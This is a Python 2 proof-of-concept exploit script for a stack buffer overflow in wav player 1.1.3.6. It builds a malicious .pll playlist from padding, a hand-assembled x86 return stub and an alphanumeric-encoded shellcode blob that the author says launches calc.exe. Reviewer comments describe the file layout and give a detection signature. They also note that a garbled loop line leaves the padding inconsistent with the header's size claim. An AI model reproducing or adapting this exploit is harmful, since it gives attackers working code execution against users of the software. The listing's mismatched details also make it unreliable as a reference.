# Exploit Title: wav player 1.1.3.6 .pll Buffer Overflow
# Date: 12/09/2011
# Author: Ivan Garcia Ferreira
# Version: 1.1.3.6
# Tested on: Windows 7 SP1 x86 Spanish
#
# Description:
# Wav player cannot properly handle large playlists (more than 1G).
#
# Reproduce:
# Open the wav player, make a playlist and save it. Then close the
# player and run this exploit to create the new playlist. When you open
# wav player again, you will see the calc. ;)
#
# Thanks to:
# Corelan Team for their excellent articles about exploits
# Proof-of-concept file generator, written in Python 2 syntax (`print` is
# used as a statement). It only writes a crafted playlist file named
# wv_player.pll into the current working directory; it does not launch or
# interact with the player.
#
# Layout of the generated file, in write order: a run of "A" filler, a short
# marker string, a handful of single/multi-byte values the author annotates
# as x86 instructions, a run of "B" filler, an upper-case/digit-only encoded
# payload, and a final run of "A" filler.
#
# The per-byte mnemonics and constants in the trailing comments are the
# author's annotations; they are not verified here against how the player
# decodes the file.
#
# Triage note: the output starts with 1034 "A" bytes followed by the literal
# "t%dA". A .pll playlist with that shape, or one far larger than an
# ordinary playlist, is worth flagging.
# NOTE(review): presumably the fix is on the player side (bounding field
# lengths when a .pll is loaded); the page names no patched version.
fichero = open("wv_player.pll","w")
print "[+] Creating exploit .pll..."
fichero.write("A"*1034)# Padding
fichero.write("t%dA")#help the first ret
fichero.write("\x6d")#nop/align
fichero.write("\x55")#push ebp
fichero.write("\x6d")#nop/align
fichero.write("\x58")#pop eax
fichero.write("\x6d")#nop/align
fichero.write("\x05\x14\x11")#add eax,0x11001400
fichero.write("\x6d")#nop/align
fichero.write("\x2d\x04\x11")#sub eax,0x11001300
fichero.write("\x6d")#nop/align
fichero.write("\x50")#push eax
fichero.write("\x6d")#nop/align
fichero.write("\xc3")#ret
fichero.write("B"*306)# more padding
# Author's label for the next write: Shellcode WinExec "calc.exe".
# The literal consists only of upper-case letters and digits; what it decodes
# to is taken from the author's description and is not verified here.
fichero.write("PPYAIAIAIAIAQATAXAZAPA3QADAZA"+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"+"QQ2LRCM0LJA")
# Padding to get the crash
# NOTE(review): in this copy the text "for cont in range(1,14000):" is run
# into the preceding comment rather than being code, so the write below
# executes exactly once (15000 bytes) as the script stands. That does not
# match the "more than 1G" figure in the header. TODO confirm against the
# original listing.
fichero.write("A"*15000)
# Close the handle so the buffered data is flushed to wv_player.pll.
fichero.close()
print "[+] File Exploit .pll Created."